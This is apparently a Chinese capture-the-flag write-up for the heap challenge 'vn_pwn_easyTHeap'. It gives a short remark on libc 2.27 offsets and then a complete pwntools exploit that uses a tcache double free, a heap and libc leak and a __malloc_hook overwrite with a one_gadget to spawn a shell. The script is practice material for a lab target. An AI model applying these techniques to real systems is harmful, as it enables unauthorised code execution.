pwn_debug
pwn_debug 的 2.27 版本计算出来 <main_arena+96> 到 libc_base 的偏移为 0x3afca0 ,而 ub18 的 2.27 偏移算出来是 0x3ebca0 。远程一直打不通卡了一整天,后来是别的师傅调出来告诉我的 orz...
exp 脚本
from pwn_debug import *
context.log_level = 'debug'
pdbg = pwn_debug('./vn_pwn_easyTHeap')
pdbg.debug('2.27')
pdbg.local('./libc/libc-2.27.so')
pdbg.remote('node3.buuoj.cn',28327)
p = pdbg.run('local')
libc = ELF('./libc/libc-2.27.so')
#libc = pdbg.libc
def add(size):
p.sendlineafter("choice: ",'1')
p.sendlineafter("size?",str(size))
def edit(index,content):
p.sendlineafter('choice: ','2')
p.sendlineafter("idx?",str(index))
p.sendlineafter("content:",content)
def show(index):
p.sendlineafter("choice: ",'3')
p.sendlineafter("idx?",str(index))
def free(index):
p.sendlineafter("choice: ",'4')
p.sendlineafter("idx?",str(index))
add(0x100)#0
add(0x10)#1
free(0)
free(0)
show(0)
heap_addr = u64(p.recv(6).ljust(8,'x00'))-0x250
add(0x100)#2
edit(2,p64(heap_addr))
add(0x100)#3
add(0x100)#4
edit(4,'x00'*15 + 'x07')
free(0)
show(0)
libcbase = u64(p.recv(6).ljust(8,'x00')) - 0x3ebca0
malloc_hook = libcbase + libc.symbols['__malloc_hook']
realloc = libcbase + libc.symbols['realloc']
one_ge=[0x4f2c5,0x4f322,0x10a38c]
gdb.attach(p)
edit(4,'x00'*15+'x01'+p64(0)*21+p64(malloc_hook-8))
#gdb.attach(p)
print p64(libcbase+one_ge[2])+p64(realloc+4)
#p.interactive()
add(0x100)#5
#gdb.attach(p)
print 'one_ge[2]:'+ str(hex(libcbase+one_ge[2]))
print 'realloc+4:' +str(hex(realloc+4))
edit(5,p64(libcbase+one_ge[2])+p64(realloc+4))
#gdb.attach(p)
add(0x100)
p.interactive()